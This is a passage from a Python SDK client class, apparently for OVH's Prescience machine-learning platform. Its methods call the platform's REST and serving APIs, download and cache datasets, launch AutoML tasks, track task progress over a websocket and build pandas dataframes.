query_parameters=query_parameters)
from prescience_client.bean.dataset import Dataset
return Dataset(json=result, prescience=self)
def refresh_dataset(self,
dataset_id: str,
filepath: str = None) -> 'Task':
"""
Launch a refresh task on a dataset
:param dataset_id: The ID of the dataset we want to launch a refresh on
:param filepath: The path of the local input file/directory
:param filepath: The path of the local input file/directory
:return: The refresh task object
"""
if filepath:
if os.path.isdir(filepath):
multipart = [
(
'input-file',
(pycurl.FORM_FILE, os.path.join(filepath, filename))
) for filename in os.listdir(filepath)
]
else:
multipart = [
('input-file', (pycurl.FORM_FILE, filepath))
]
else:
multipart = None
_, result, _ = self.__post(path=f'/ml/refresh/{dataset_id}', multipart=multipart)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def get_project(self):
"""
Get the current prescience project we are working on
:return: the current prescience project we are working on
"""
_, project, _ = self.__get(path='/project')
return Project(project)
def tasks(self, page: int = 1, status: str = None):
"""
Get the paginated list of prescience tasks for the current project
:param page: The number of the page to get
:param status: Filter the status of the tasks
:return: the page object containing prescience tasks
"""
query_parameters = {'page': page}
if status:
query_parameters.update({'status': status})
_, page, _ = self.__get(path='/task', query_parameters=query_parameters)
from prescience_client.bean.task import Task
from prescience_client.bean.task import TaskFactory
from prescience_client.bean.page_result import PageResult
return PageResult(json_dict=page, clazz=Task, factory_method=TaskFactory.construct, prescience=self)
def task(self, task_uuid: str) -> 'Task':
_, result, _ = self.__get(path=f'/task/{task_uuid}')
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(task_dict=result, prescience=self)
def sources(self, page: int = 1):
"""
Get the paginated list of created prescience sources for the current project
:param page: The number of the page to get
:return: the page object containing prescience sources
"""
query_parameters = {'page': page}
_, page, _ = self.__get(path='/source', query_parameters=query_parameters)
from prescience_client.bean.source import Source
from prescience_client.bean.page_result import PageResult
return PageResult(page, Source, prescience=self)
def source(self, source_id: str):
"""
Get a single source from its ID
:param source_id: The source ID
:return: The source object
"""
from prescience_client.bean.source import Source
_, source, _ = self.__get(path=f'/source/{source_id}')
return Source(json_dict=source, prescience=self)
def datasets(self, page: int = 1, source_id_filter: str = None):
"""
Get the paginated list of prescience datasets for the current project
:param page: The number of the page to get
:param source_id_filter: The filter to use on source ID (default: None)
:return: the page object containing prescience datasets
"""
query_parameters = {'page': page}
if source_id_filter is not None:
query_parameters['source_id'] = source_id_filter
_, page, _ = self.__get(path='/dataset', query_parameters=query_parameters)
from prescience_client.bean.page_result import PageResult
from prescience_client.bean.dataset import Dataset
return PageResult(page, Dataset, prescience=self)
def dataset(self, dataset_id: str):
"""
Get a single dataset from its ID
:param dataset_id: The dataset ID
:return: The dataset object
"""
_, source, _ = self.__get(path=f'/dataset/{dataset_id}')
from prescience_client.bean.dataset import Dataset
return Dataset(json=source, prescience=self)
def get_evaluation_results(self,
dataset_id: str,
page: int = 1,
size: int = 100,
sort_column: str = None,
sort_direction: SortDirection = SortDirection.ASC,
forecasting_horizon_steps: int = None,
forecasting_discount: float = None,
status: Status = None ) -> 'PageResult':
"""
Get the paginated list of evaluation results
:param dataset_id: The dataset ID
:param page: The number of the page to get
:param size: The number of evaluations result to get (min 1)
:param sort_column: The column to sort on
:param sort_direction: The direction to sort on
:param forecasting_horizon_steps: The horizon step to filter on (default: None)
:param forecasting_discount: The forecasting discount to filter on (default: None)
:param status: The optimization status to filter on
:return: the page object containing the evaluation results
"""
query_parameters = {
'dataset_id': dataset_id,
'page': page,
'size': size,
'sort_column': sort_column,
'forecasting_horizon_steps': forecasting_horizon_steps,
'forecasting_discount': forecasting_discount,
'sort_direction': str(sort_direction)
}
if status:
query_parameters['status']: str(status)
final_query_parameters = {k: v for k, v in query_parameters.items() if v is not None}
_, page, _ = self.__get(path='/evaluation-result', query_parameters=final_query_parameters)
from prescience_client.bean.page_result import PageResult
from prescience_client.bean.evaluation_result import EvaluationResult
return PageResult(page, EvaluationResult, prescience=self)
def models(self, page: int = 1, dataset_id_filter: str = None):
"""
Get the paginated list of models
:param page: The number of the page to get
:param dataset_id_filter: The filter to use on dataset ID (default: None)
:return: the page object containing the models
"""
query_parameters = {'page': page}
if dataset_id_filter is not None:
query_parameters['dataset_id'] = dataset_id_filter
_, page, _ = self.__get(path='/model', query_parameters=query_parameters)
from prescience_client.bean.page_result import PageResult
from prescience_client.bean.model import Model
return PageResult(page, Model, prescience=self)
def model(self, model_id: str):
"""
Get a single model from its ID
:param model_id: The model ID
:return: The model object
"""
_, model, _ = self.__get(path=f'/model/{model_id}')
from prescience_client.bean.model import Model
return Model(json=model, prescience=self)
def model_metric(self, model_id: str) -> 'ModelMetric':
"""
Get the model metric of a wanted model
:param model_id: The model ID
:return: The model metric object
"""
model = self.model(model_id)
_, metric, _ = self.__get(path=f'/model/{model_id}/additional-information/metrics')
from prescience_client.bean.model_metric import get_model_metric
return get_model_metric(metric, model)
def model_metric_from_csv(self,
model_id: str,
filepath: str
) -> 'Task':
"""
Upload a local input file on prescience and launch a Parse Task on it for creating a source.
:param model_id: The id of the model to evaluate
:param filepath: The path of the local input file
:return: The model metric object
"""
_, metric, _ = self.__post(
path=f'/metrics/{model_id}/transform-model',
filepath=filepath,
call_type=PrescienceWebService.SERVING)
from prescience_client.bean.model_metric import ModelMetric
return ModelMetric(json=metric, prescience=self)
def model_test_evaluation(self, model_id: str) -> 'TestEvaluations':
"""
Get the test evaluation of a wanted model
:param model_id: The model ID
:return: The test evaluation object
"""
_, test_evaluation_dict, _ = self.__get(path=f'/model/{model_id}/additional-information/test_evaluations')
from prescience_client.bean.test_evaluation import TestEvaluations
return TestEvaluations(json=test_evaluation_dict, prescience=self)
def get_list_source_files(self, source_id: str) -> list:
"""
Get the list of all files of a given source data
:param source_id: The wanted source id
:return: the list of all files of a given source data
"""
_, response, _ = self.__get(path=f'/download/source/{source_id}')
return response
def get_list_dataset_train_files(self, dataset_id: str) -> list:
"""
Get the list of all files of a given dataset train data
:param dataset_id: The wanted dataset id
:return: the list of all files of a given dataset train data
"""
_, response, _ = self.__get(path=f'/download/dataset/{dataset_id}/train')
return response
def get_list_dataset_test_files(self, dataset_id: str) -> list:
"""
Get the list of all files of a given dataset test data
:param dataset_id: The wanted dataset id
:return: the list of all files of a given dataset test data
"""
_, response, _ = self.__get(path=f'/download/dataset/{dataset_id}/test')
return response
def get_list_dataset_fold_train_files(self, dataset_id: str, fold_number: int) -> list:
"""
Get the list of all files of a given dataset test data
:param dataset_id: The wanted dataset id
:param fold_number: Number of the fold
:return: the list of all files of a given dataset test data
"""
_, response, _ = self.__get(path=f'/download/dataset/{dataset_id}/fold/{fold_number}/train')
return response
def get_list_dataset_fold_test_files(self, dataset_id: str, fold_number: int) -> list:
"""
Get the list of all files of a given dataset test data
:param dataset_id: The wanted dataset id
:param fold_number: Number of the fold
:return: the list of all files of a given dataset test data
"""
_, response, _ = self.__get(path=f'/download/dataset/{dataset_id}/fold/{fold_number}/test')
return response
def download_source(self, source_id: str, output_directory: str):
"""
Download all source related files into the given directory
:param source_id: The source id to download
:param output_directory: The output directory (will be created if it doesn't exist)
"""
source_files = self.get_list_source_files(source_id=source_id)
if not os.path.exists(output_directory):
os.makedirs(output_directory)
for output in source_files:
_, file, _ = self.__get(path=f'/download/source/{source_id}/{output}', accept='application/octet-stream')
full_output_path = os.path.join(output_directory, output)
with open(full_output_path, 'wb') as stream:
stream.write(file)
stream.close()
def download_dataset(self, dataset_id: str, output_directory: str, test_part: bool):
"""
Download all dataset related files into the given directory
:param dataset_id: The dataset id to download
:param output_directory: The output directory (will be created if it doesn't exist)
:param test_part: Download only the dataset 'test' part and not the default 'train' part
"""
if not os.path.exists(output_directory):
os.makedirs(output_directory)
# Download train files
if test_part:
all_files = self.get_list_dataset_test_files(dataset_id=dataset_id)
path_part = 'test'
else:
all_files = self.get_list_dataset_train_files(dataset_id=dataset_id)
path_part = 'train'
for output in all_files:
_, file, _ = self.__get(path=f'/download/dataset/{dataset_id}/{path_part}/{output}',
accept='application/octet-stream')
full_output_path = os.path.join(output_directory, output)
with open(full_output_path, 'wb') as stream:
stream.write(file)
stream.close()
def download_fold(self, dataset_id: str, fold_number: int, output_directory: str, test_part: bool):
"""
Download all fold related files into the given directory
:param dataset_id: The dataset id of the wanted fold
:param fold_number: The number of the fold t download
:param output_directory: The output directory (will be created if it doesn't exist)
:param test_part: Download only the dataset 'test' part and not the default 'train' part
"""
if not os.path.exists(output_directory):
os.makedirs(output_directory)
# Download train files
if test_part:
all_files = self.get_list_dataset_fold_test_files(dataset_id=dataset_id, fold_number=fold_number)
path_part = 'test'
else:
all_files = self.get_list_dataset_fold_train_files(dataset_id=dataset_id, fold_number=fold_number)
path_part = 'train'
for output in all_files:
_, file, _ = self.__get(path=f'/download/dataset/{dataset_id}/fold/{fold_number}/{path_part}/{output}',
accept='application/octet-stream')
full_output_path = os.path.join(output_directory, output)
with open(full_output_path, 'wb') as stream:
stream.write(file)
stream.close()
def __get(self, path: str, query_parameters: dict = None, accept: str = 'application/json'):
"""
Generic HTTP GET call
:param path: the http path to call
:param query_parameters: The dict of query parameters, None if any
:param accept: accept header
:return: The tuple3 : (http response code, response content, cookie token)
"""
return self.call(method='GET', path=path, query_parameters=query_parameters, accept=accept)
def __post(self,
path: str,
data=None,
multipart: list = None,
query_parameters: dict = None,
call_type: PrescienceWebService = PrescienceWebService.API,
filepath: str = None):
"""
Generic HTTP POST call
:param path: the http path to call
:param data: The body json data to send (as dict). None if any
:param multipart: The list of multipart part to send. None of any
:param query_parameters: The dict of query parameters, None if any
:param call_type: The prescience web service called
:param filepath: path ot data file
:return: The tuple3 : (http response code, response content, cookie token)
"""
if filepath is not None:
content_type = 'application/octet-stream'
else:
content_type = 'application/json'
if multipart is not None:
content_type = 'multipart/form-data'
return self.call(
method='POST',
path=path,
data=data,
multipart=multipart,
content_type=content_type,
query_parameters=query_parameters,
call_type=call_type,
filepath=filepath
)
def __delete(self, path: str):
"""
Generic HTTP DELETE call
:param path: The http path to call
"""
return self.call(
method='DELETE',
path=path,
accept=''
)
@staticmethod
def progress_curl():
bar = None
def progress(download_t, download_d, upload_t, upload_d): # pylint: disable=unused-argument
nonlocal bar
if upload_t > 0 and not bar:
bar = IncrementalBar('Uploading', max=upload_t)
bar.suffix = '%(percent).1f%%'
if bar:
bar.next(upload_d - bar.index)
return progress
def call(
self,
method: str,
path: str,
query_parameters: dict = None,
data: dict = None,
multipart: list = None,
content_type: str = 'application/json',
call_type: PrescienceWebService = PrescienceWebService.API,
accept: str = 'application/json',
filepath: str = None
):
"""
Generic HTTP call wrapper for pyCurl
:param method: The HTTP method to call
:param path: The path to call
:param query_parameters: The dict of query parameters, None if any
:param data: The body json data to send (as dict). None if any
:param multipart: The list of multipart part to send. None of any
:param content_type: The content type header to use (default: application/json)
:param timeout_seconds: The timeout of the http request
:param call_type: The prescience web service called
:param accept: accept header
:return: The tuple3 : (http response code, response content, cookie token)
"""
if self.config().is_verbose_activated():
print(data)
switch = {
PrescienceWebService.API: f'{self.prescience_config.get_current_api_url()}{path}',
PrescienceWebService.ADMIN_API: f'{self.prescience_config.get_current_admin_api_url()}{path}',
PrescienceWebService.SERVING: f'{self.prescience_config.get_current_serving_url()}{path}',
PrescienceWebService.CONFIG: f'{self.prescience_config.get_current_config_url()}{path}'
}
complete_url = switch.get(call_type)
if query_parameters is not None and len(query_parameters) != 0:
# remove None Parameter
query_parameters = {k: query_parameters[k] for k in query_parameters.keys() if query_parameters[k]}
encoded_parameter = urllib.parse.urlencode(query_parameters)
complete_url = f'{complete_url}?{encoded_parameter}'
buffer = BytesIO()
http_headers = [
f'Authorization: Bearer {self.prescience_config.get_current_token()}',
f'Content-Type: {content_type}',
f'User-Agent: OVH-Prescience-Python-Client'
]
if accept != '':
http_headers.append(f'accept: {accept}')
curl = pycurl.Curl()
curl.setopt(pycurl.TIMEOUT, self.config().get_timeout())
curl.setopt(pycurl.URL, complete_url)
curl.setopt(pycurl.HTTPHEADER, http_headers)
curl.setopt(pycurl.CUSTOMREQUEST, method)
curl.setopt(pycurl.NOPROGRESS, False)
curl.setopt(pycurl.XFERINFOFUNCTION, self.progress_curl())
if self.config().is_verbose_activated():
curl.setopt(pycurl.VERBOSE, 1)
file = None
if filepath is not None:
file = open(filepath, 'rb')
curl.setopt(pycurl.POST, 1)
curl.setopt(pycurl.POSTFIELDSIZE, os.stat(filepath).st_size)
curl.setopt(pycurl.READDATA, file)
if data is not None:
curl.setopt(pycurl.POSTFIELDS, json.dumps(data))
if multipart is not None:
curl.setopt(pycurl.HTTPPOST, multipart)
curl.setopt(pycurl.WRITEDATA, buffer)
# Catch token cookie if any
cookie_token = []
# closure to capture Set-Cookie
def _catch_cookie_token(header):
match = re.match("^Set-Cookie: .*token=(.+?);.*$", header.decode("utf-8"))
if match:
cookie_token.append(('token', match.group(1)))
# use closure to collect cookies sent from the server
curl.setopt(pycurl.HEADERFUNCTION, _catch_cookie_token)
try:
curl.perform()
except pycurl.error as error:
prescience_error = PyCurlExceptionFactory.construct(error)
self.config().handle_exception(prescience_error)
finally:
if file is not None:
file.close()
status_code = curl.getinfo(pycurl.RESPONSE_CODE)
response_content = buffer.getvalue()
if accept != 'application/octet-stream':
response_content = response_content.decode('UTF-8')
curl.close()
if status_code // 100 != 2:
prescience_error = HttpErrorExceptionFactory.construct(status_code, response_content)
self.config().handle_exception(prescience_error)
else:
if accept == 'application/json':
json_response = json.loads(response_content)
if self.config().is_verbose_activated():
print(f'[{status_code}] {json_response}')
return status_code, json_response, dict(cookie_token)
else:
return status_code, response_content, dict(cookie_token)
############################################
############### SERVING METHODS ############
############################################
def serving_model_evaluator(self, model_id: str):
"""
Access the evaluator of a model on prescience-serving api
:param model_id: The id of the model
:return: The answered json dictionary for the evaluator
"""
_, result, _ = self.call(
method='GET',
path=f'/evaluator/{model_id}',
call_type=PrescienceWebService.SERVING
)
return result
def serving_model_evaluate(self,
model_id: str,
flow_type: FlowType,
request_data):
"""
Evaluate a model from a single request
:param model_id: The id of the model to evaluate
:param flow_type: The flow type of the evaluation
:param request_data: The json dictionary or list of dictionary containing evaluation parameters
:return: The json dictionary of the answer
"""
path = f'/eval/{model_id}/{str(flow_type)}'
if isinstance(request_data, list):
path = f'/eval/{model_id}/{str(flow_type)}/batch/json'
_, result, _ = self.call(
method='POST',
path=path,
call_type=PrescienceWebService.SERVING,
data=request_data
)
return result
def get_available_configurations(self, kind: AlgorithmConfigurationCategory) -> 'AlgorithmConfigurationList':
path = f'/{str(kind)}'
_, result, _ = self.call(
method='GET',
path=path,
call_type=PrescienceWebService.CONFIG
)
from prescience_client.bean.algorithm_configuration import AlgorithmConfigurationList
return AlgorithmConfigurationList(json_dict=result, category=kind)
def start_auto_ml(
self,
source_id,
label_id: str,
problem_type: ProblemType,
scoring_metric: ScoringMetric,
log_enabled: bool = False,
dataset_id: str = None,
model_id: str = None,
time_column: str = None,
nb_fold: int = None,
fold_strategy: FoldStrategy = None,
selected_column: list = None,
budget: int = None,
forecasting_horizon_steps: int = None,
forecast_discount: float = None,
formatter: str = None,
datetime_exogenous: list = None,
granularity: str = None
) -> ('Task', str, str):
"""
Start an auto-ml task
:param source_id: The ID of the initial source object
:param label_id: ID of the label to predict
:param problem_type: The type of the problem
:param scoring_metric: The scoring metric to optimize on
:param log_enabled: Preprocess numeric variable with log10
:param dataset_id: The wanted dataset_id (will generate one if unset)
:param model_id: The wanted model_id (will generate one if unset)
:param time_column: The ID of the time column (Only in case of a time_series_forecast)
:param nb_fold: The number of fold to create during the preprocessing of the source
:param fold_strategy: For time series the way to split data in different fold
:param selected_column: The column to keep (will keep everything if unset)
:param budget: The budget to use during optimization
:param forecasting_horizon_steps: The wanted forecasting horizon (in case of a time_series_forecast)
:param forecast_discount: The wanted forecasting discount
:param formatter: (For TS only) The string formatter that prescience should use for parsing date column (ex: yyyy-MM-dd)
:param datetime_exogenous: (For TS only) The augmented features related to date to computing during preprocessing
:param granularity: (For TS only) The granularity to use for the date
:return: The tuple3 of (initial task, dataset id, model id)
"""
if dataset_id is None:
dataset_id = f'{source_id}_dataset_{self._get_unique_id()}'
if model_id is None:
model_id = f'{source_id}_model_{self._get_unique_id()}'
body = {
'dataset_id': dataset_id,
'label_id': label_id,
'model_id': model_id,
'problem_type': str(problem_type),
'scoring_metric': str(scoring_metric),
'custom_parameters': {},
'optimization_method': 'SMAC',
'multiclass': False,
'log_enabled': log_enabled
}
if time_column is not None:
body['time_column_id'] = time_column
if nb_fold is not None and nb_fold > 1:
body['nb_fold'] = nb_fold
if fold_strategy is not None:
body['fold_strategy'] = str(fold_strategy)
if selected_column is not None and len(selected_column) >= 0:
body['selected_column'] = selected_column
if budget is not None and budget >= 0:
body['budget'] = budget
if forecasting_horizon_steps is not None and forecasting_horizon_steps >= 0:
body['forecasting_horizon_steps'] = forecasting_horizon_steps
if forecast_discount is not None:
body['forecasting_discount'] = forecast_discount
date_time_info = {}
if formatter is not None:
date_time_info['format'] = formatter
if datetime_exogenous is not None:
date_time_info['exogenous'] = [str(x) for x in datetime_exogenous]
if granularity is not None:
date_time_info['granularity'] = str(granularity)
if len(date_time_info) != 0:
body['datetime_info'] = date_time_info
print('Starting AutoML task with following arguments :')
print(json.dumps(body, indent=4))
_, result, _ = self.__post(path=f'/ml/auto-ml/{source_id}', data=body)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self), dataset_id, model_id
def start_auto_ml_warp10(
self,
warp_input: Warp10TimeSerieInput,
scheduler_output: Warp10Scheduler,
scoring_metric: ScoringMetric,
dataset_id: str = None,
model_id: str = None,
log_enabled: bool = False,
nb_fold: int = None,
fold_strategy: FoldStrategy = None,
budget: int = None,
forecasting_horizon_steps: int = None,
forecast_discount: float = None,
datetime_exogenous: list = None,
granularity: str = None
) -> ('Task', str, str):
"""
Start an auto-ml-warp task
:param warp_input: The Warp10 TimeSerie Input
:param scheduler_output: The Scheduler Output
:param scoring_metric: The scoring metric to optimize on
:param dataset_id: The wanted dataset_id (will generate one if unset)
:param model_id: The wanted model_id (will generate one if unset)
:param log_enabled: Preprocess numeric variable with log10
:param nb_fold: The number of fold to create during the preprocessing of the source
:param fold_strategy: For time series the way to split data in different fold
:param budget: The budget to use during optimization
:param forecasting_horizon_steps: The wanted forecasting horizon (in case of a time_series_forecast)
:param forecast_discount: The wanted forecasting discount
:param datetime_exogenous: (For TS only) The augmented features related to date to computing during preprocessing
:param granularity: (For TS only) The granularity to use for the date
:return: The tuple3 of (initial task, dataset id, model id)
"""
if dataset_id is None:
dataset_id = f'{warp_input.source_id}_dataset_{self._get_unique_id()}'
if model_id is None:
model_id = f'{warp_input.source_id}_model_{self._get_unique_id()}'
body = {
'dataset_id': dataset_id,
'model_id': model_id,
'scoring_metric': str(scoring_metric),
'log_enabled': log_enabled
}
if nb_fold and nb_fold > 1:
body['nb_fold'] = nb_fold
if fold_strategy is not None:
body['fold_strategy'] = str(fold_strategy)
if budget and budget >= 0:
body['budget'] = budget
if forecasting_horizon_steps and forecasting_horizon_steps >= 0:
body['forecasting_horizon_steps'] = forecasting_horizon_steps
if forecast_discount:
body['forecasting_discount'] = forecast_discount
date_time_info = {'format': 'TS_N'}
if datetime_exogenous is not None:
date_time_info['exogenous'] = [str(x) for x in datetime_exogenous]
if granularity is not None:
date_time_info['granularity'] = str(granularity)
if len(date_time_info) > 1:
body['datetime_info'] = date_time_info
body.update(warp_input.to_dict())
if scheduler_output:
scheduler_output.output_value.labels["model"] = model_id
body.update(scheduler_output.to_dict())
print('Starting AutoML Warp 10 task with following arguments :')
print(json.dumps(body, indent=4))
_, result, _ = self.__post(path=f'/ml/auto-ml-ts', data=body)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self), dataset_id, model_id
############################################
########### WEB-SOCKET METHODS #############
############################################
def __init_ws_connection(self):
"""
Initialize the web-socket connection :
- Log into prescience with the configured Bearer token for getting the cookie token
- Create the web-socket connection with the previous cookie token
:return: The web-socket connection
"""
token = self.login()
ws = create_connection(self.prescience_config.get_current_websocket_url(), cookie=f'token={token}')
ws.send('')
return ws
# Wait for the next message related to the given task
def __wait_for_task_message(self, ws, task: 'Task'):
"""
Wait until the next related task
:param ws: The web socket connection
:param task: the task to watch
:return: The related task catch from WS connection
"""
task_message = None
while task_message is None or task_message.uuid() != task.uuid() or task_message.type() != task.type():
rcv_message = ws.recv()
message = json.loads(rcv_message)['entity']
from prescience_client.bean.task import TaskFactory
task_message = TaskFactory.construct(message, self)
return task_message
def wait_for_task_done_or_error(self, initial_task: 'Task') -> 'Task':
"""
Wait until the given task is DONE or ERROR
:param initial_task:
:return: The last state of the Task
"""
bar = ChargingBar(initial_task.type(), max=initial_task.total_step())
if initial_task.current_step_description() is not None:
bar.message = f'{initial_task.type()}'
bar.next(0)
final_task = self.retry_wait_for_finish(bar, initial_task, True)
bar.message = f'{final_task.type()} - {final_task.status().to_colored()}'
if final_task.status() == Status.DONE:
# Complete the progression in case we missed some messages
bar.next(bar.remaining)
bar.finish()
return final_task
def retry_wait_for_finish(self, bar, initial_task, retry):
# Initialize web-socket connection
websocket = self.__init_ws_connection()
result_queue = Queue()
exec_process = Process(target=self.wait_for_finish, args=(websocket, bar, initial_task, result_queue))
exec_process.start()
final_task = self.task(initial_task.uuid())
if final_task.status() in [Status.DONE, Status.ERROR]:
# in this case the task was finished potentially before the websocket was connected, we do not need to watch
exec_process.terminate()
else:
# in this case when we started to watch the websocket, the task was not over, we wait
ok, result_payload = result_queue.get()
exec_process.join()
if ok:
from prescience_client.bean.task import TaskFactory
final_task = TaskFactory.construct(result_payload, self)
elif retry:
# we failed to watch the task through the end, start again once
# Closing web-socket
websocket.close()
self.retry_wait_for_finish(bar, initial_task, False)
else:
final_task = initial_task
# Closing result queue
result_queue.close()
# Closing web-socket
websocket.close()
return final_task
def wait_for_finish(self, websocket, bar, task, queue: Queue):
current_task = task
try:
while current_task.status() != Status.DONE and current_task.status() != Status.ERROR:
current_task = self.__wait_for_task_message(websocket, current_task)
bar.next()
except WebSocketException:
# we occasionally experience unexpected websocket connection close
queue.put((False, None))
queue.put((True, current_task.initial_payload))
############################################
############### FACTORY METHODS ############
############################################
def csv_local_file_input(self, filepath: str, headers: bool = True) -> 'CsvLocalFileInput':
"""
Create a csv local input file
:param filepath: The path of your csv
:param headers: Does the csv file has header ? (default: True)
:return: The CsvLocalFileInput object
"""
from prescience_client.bean.entity.local_file_input import CsvLocalFileInput
return CsvLocalFileInput(filepath=filepath, headers=headers, prescience=self)
def parquet_local_file_input(self, filepath: str) -> 'CsvLocalFileInput':
"""
Create a parquet local input file
:param filepath: The path of your parquet
:return: The ParquetLocalFileInput object
"""
from prescience_client.bean.entity.local_file_input import ParquetLocalFileInput
return ParquetLocalFileInput(filepath=filepath, prescience=self)
############################################
#### LOCAL CACHE MANAGEMENT METHODS ########
############################################
def cache_source_get_full_path(self, source_id: str) -> str:
"""
Get the full path of the local cache for the given source
:param source_id: the wanted source id
:return: the full path of the local cache for the given source
"""
cache_source_directory = self.config().get_or_create_cache_sources_directory()
return os.path.join(cache_source_directory, source_id)
def cache_dataset_get_full_path(self, dataset_id: str, test_part: bool) -> str:
"""
Get the full path of the local cache for the given dataset
:param dataset_id: the wanted dataset id
:param test_part: cache only the test part of the dataset instead of the default train part
:return: the full path of the local cache for the given dataset
"""
cache_dataset_directory = self.config().get_or_create_cache_datasets_directory()
if test_part:
test_path = os.path.join(cache_dataset_directory, dataset_id, 'test')
return self.config().create_config_path_if_not_exist(test_path)
else:
train_path = os.path.join(cache_dataset_directory, dataset_id, 'train')
return self.config().create_config_path_if_not_exist(train_path)
def cache_dataset_fold_get_full_path(self, dataset_id: str, fold_number: int, test_part: bool) -> str:
"""
Get the full path of the local cache for the given fold
:param dataset_id: the wanted dataset id
:param fold_number: the fold number
:param test_part: cache only the test part of the dataset instead of the default train part
:return: the full path of the local cache for the given dataset
"""
cache_dataset_directory = self.config().get_or_create_cache_datasets_directory()
if test_part:
test_path = os.path.join(cache_dataset_directory, dataset_id, 'fold', str(fold_number), 'test')
return self.config().create_config_path_if_not_exist(test_path)
else:
train_path = os.path.join(cache_dataset_directory, dataset_id, 'fold', str(fold_number), 'train')
return self.config().create_config_path_if_not_exist(train_path)
def cache_clean_fold(self, dataset_id: str, fold_number: int, test_part: bool):
"""
Clean the local cache data of the given fold
:param dataset_id: the dataset id
:param fold_number: The number of the fold
:param test_part: clean only the test part and not the default train part
"""
datasetid_path = self.cache_dataset_fold_get_full_path(
dataset_id=dataset_id,
fold_number=fold_number,
test_part=test_part
)
if os.path.exists(datasetid_path):
shutil.rmtree(datasetid_path)
def cache_clean_dataset(self, dataset_id: str, test_part: bool):
"""
Clean the local cache data of the given dataset
:param dataset_id: the dataset id
:param test_part: clean only the test part and not the default train part
"""
datasetid_path = self.cache_dataset_get_full_path(dataset_id=dataset_id, test_part=test_part)
if os.path.exists(datasetid_path):
shutil.rmtree(datasetid_path)
def cache_clean_source(self, source_id: str):
"""
Clean the local cache data of the given source
:param source_id: the source id
"""
sourceid_path = self.cache_source_get_full_path(source_id=source_id)
if os.path.exists(sourceid_path):
shutil.rmtree(sourceid_path)
def update_cache_fold(self, dataset_id, fold_number: int, test_part: bool):
"""
Request for locally caching the data of the wanted fold of a dataset.
If the local fold data are already up to date, it will do nothing.
:param dataset_id: The dataset id of the wanted fold
:param fold_number: The fold number
:param test_part: select only the test part of the dataset instead of the default train part
:return: Return the directory in which dataset data are locally saved
"""
fold_path = self.cache_dataset_fold_get_full_path(
dataset_id=dataset_id,
fold_number=fold_number,
test_part=test_part
)
if test_part:
expected_files = self.get_list_dataset_fold_test_files(dataset_id=dataset_id, fold_number=fold_number)
else:
expected_files = self.get_list_dataset_fold_train_files(dataset_id=dataset_id, fold_number=fold_number)
if os.path.exists(fold_path) and set(os.listdir(fold_path)) == set(expected_files):
print(f'Cache for fold {fold_number} of dataset \'{dataset_id}\' is already up to date on {fold_path}')
else:
self.cache_clean_fold(dataset_id=dataset_id, fold_number=fold_number, test_part=test_part)
print(f'Updating cache for source \'{dataset_id}\' : {fold_path}')
self.download_fold(
dataset_id=dataset_id,
fold_number=fold_number,
output_directory=fold_path,
test_part=test_part
)
return fold_path
def update_cache_dataset(self, dataset_id, test_part: bool) -> str:
"""
Request for locally caching the data of the wanted dataset.
If the local dataset data are already up to date, it will do nothing.
:param dataset_id: The wanted dataset id
:param test_part: select only the test part of the dataset instead of the default train part
:return: Return the directory in which dataset data are locally saved
"""
datasetid_path = self.cache_dataset_get_full_path(dataset_id=dataset_id, test_part=test_part)
if test_part:
expected_files = self.get_list_dataset_test_files(dataset_id=dataset_id)
else:
expected_files = self.get_list_dataset_train_files(dataset_id=dataset_id)
if os.path.exists(datasetid_path) and set(os.listdir(datasetid_path)) == set(expected_files):
print(f'Cache for dataset \'{dataset_id}\' is already up to date on {datasetid_path}')
else:
self.cache_clean_dataset(dataset_id=dataset_id, test_part=test_part)
print(f'Updating cache for source \'{dataset_id}\' : {datasetid_path}')
self.download_dataset(dataset_id=dataset_id, output_directory=datasetid_path, test_part=test_part)
return datasetid_path
def update_cache_source(self, source_id) -> str:
"""
Request for locally caching the data of the wanted source.
If the local source data are already up to date, it will do nothing.
:param source_id: The wanted source id
:return: Return the directory in which source data are locally saved
"""
sourceid_path = self.cache_source_get_full_path(source_id=source_id)
expected_files = self.get_list_source_files(source_id=source_id)
if os.path.exists(sourceid_path) and set(os.listdir(sourceid_path)) == set(expected_files):
print(f'Cache for source \'{source_id}\' is already up to date on {sourceid_path}')
else:
self.cache_clean_source(source_id=source_id)
print(f'Updating cache for source \'{source_id}\' : {sourceid_path}')
self.download_source(source_id=source_id, output_directory=sourceid_path)
return sourceid_path
def source_dataframe(self, source_id, index_column: str = None):
"""
Update source local cache for the given source and return the pandas dataframe for this source
:param source_id: the wanted source
:param index_column: optional name of the column to use as the dataframe index
:return: the pandas dataframe built from the cached source data
"""
source_data_path = self.update_cache_source(source_id=source_id)
df = pandas.read_parquet(path=source_data_path)
if index_column is not None:
df = df.set_index(index_column)
return df
def dataset_dataframe(self, dataset_id: str, test_part: bool):
"""
Update dataset local cache for the given dataset and return the pandas dataframe for this dataset
:param dataset_id: the wanted dataset
:param test_part: select only the test part of the dataset instead of the default train part
:return:
"""
dataset_data_path = self.update_cache_dataset(dataset_id=dataset_id, test_part=test_part)
if test_part:
# Concatenate all csv test files and create a single dataframe
only_csv = [x for x in os.listdir(dataset_data_path) if x.endswith('.csv')]
all_csv_path = [os.path.join(dataset_data_path, x) for x in only_csv]
all_csv_dataframe = [pandas.read_csv(x) for x in all_csv_path]
return pandas.concat(all_csv_dataframe)
else:
return pandas.read_parquet(path=dataset_data_path)
def fold_dataframe(self, dataset_id: str, fold_number: int, test_part: bool):
"""
Update fold local cache for the given dataset and return the pandas dataframe for the wanted fold
:param dataset_id: the wanted dataset
:param fold_number: The wanted fold number
:param test_part: select only the test part of the dataset instead of the default train part
:return:
"""
fold_path = self.update_cache_fold(dataset_id=dataset_id, fold_number=fold_number, test_part=test_part)
return pandas.read_parquet(path=fold_path)
def plot_source(self,
source_id: str,
x: str = None,
y: str = None,
kind: str = None,
clss: str = None,
block=False):
"""
Plot a wanted source data
:param source_id: the wanted source id
:param x: the name of the column to use as x
:param y: the name of the column to use as y
:param kind: the kind of the plot
:param block: should block until user close the window
:param clss: the name of the category column if any (i.e class or label)
"""
if kind is None and clss is None:
kind = 'line'
if kind is None and clss is not None:
kind = 'scatter'
dataframe = self.source_dataframe(source_id=source_id)
if x is not None:
dataframe = dataframe.sort_values(by=[x])
if clss is not None:
self._plot_dataframe_with_class(dataframe=dataframe, clss=clss, kind=kind, x=x, y=y)
else:
dataframe.plot(x=x, y=y, kind=kind)
